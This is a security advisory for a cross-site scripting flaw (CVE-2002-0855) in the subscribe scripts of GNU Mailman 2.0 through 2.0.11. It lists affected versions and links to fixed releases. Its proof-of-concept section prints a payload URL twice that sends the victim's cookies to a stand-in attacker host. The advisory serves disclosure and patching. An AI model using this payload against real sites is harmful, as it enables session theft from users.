GNU Mailman Subscribe Cross-Site Scripting Vulnerability
BID:5298
Info
GNU Mailman Subscribe Cross-Site Scripting Vulnerability
| Bugtraq ID: | 5298 |
| Class: | Input Validation Error |
| CVE: |
CVE-2002-0855 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 24 2002 12:00AM |
| Updated: | Jul 11 2009 02:56PM |
| Credit: | Discovery of this issue is credited to office <[email protected]>. |
| Vulnerable: |
GNU Mailman 2.0.11 GNU Mailman 2.0.10 GNU Mailman 2.0.9 GNU Mailman 2.0.8 GNU Mailman 2.0.7 GNU Mailman 2.0.6 GNU Mailman 2.0.5 GNU Mailman 2.0.4 GNU Mailman 2.0.3 GNU Mailman 2.0.2 GNU Mailman 2.0.1 GNU Mailman 2.0 |
| Not Vulnerable: |
GNU Mailman 2.0.12 |
Discussion
GNU Mailman Subscribe Cross-Site Scripting Vulnerability
GNU Mailman is prone to a cross-site scripting vulnerability. Arbitrary HTML and script code are not sanitized from the URI parameters of mailing list subscribe scripts.
An attacker may exploit this issue by creating a malicious link containing arbitrary script code and enticing a web user to visit the link.
GNU Mailman is prone to a cross-site scripting vulnerability. Arbitrary HTML and script code are not sanitized from the URI parameters of mailing list subscribe scripts.
An attacker may exploit this issue by creating a malicious link containing arbitrary script code and enticing a web user to visit the link.
Exploit / POC
GNU Mailman Subscribe Cross-Site Scripting Vulnerability
The following example was provided:
http://target/mailman/subscribe/ml-name?info=<script>document.location%3D"http://attackerhost/attackerscript.cgi?"%2Bdocument.cookie;</script>
The following example was provided:
http://target/mailman/subscribe/ml-name?info=<script>document.location%3D"http://attackerhost/attackerscript.cgi?"%2Bdocument.cookie;</script>
Solution / Fix
GNU Mailman Subscribe Cross-Site Scripting Vulnerability
Solution:
This issue has been address in Mailman version 2.0.12.
GNU Mailman 2.0
GNU Mailman 2.0.1
GNU Mailman 2.0.10
GNU Mailman 2.0.11
GNU Mailman 2.0.2
GNU Mailman 2.0.3
GNU Mailman 2.0.4
GNU Mailman 2.0.5
GNU Mailman 2.0.6
GNU Mailman 2.0.7
GNU Mailman 2.0.8
GNU Mailman 2.0.9
Solution:
This issue has been address in Mailman version 2.0.12.
GNU Mailman 2.0
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.1
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.10
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.11
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.2
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.3
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.4
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.5
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.6
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.7
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.8
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz -
Red Hat mailman-2.0.13-1.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/mailman-2.0.13-1.i386.rpm -
Red Hat mailman-2.0.13-1.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/mailman-2.0.13-1.i386.rpm -
Red Hat mailman-2.0.13-1.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/mailman-2.0.13-1.ia64.rpm
GNU Mailman 2.0.9
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz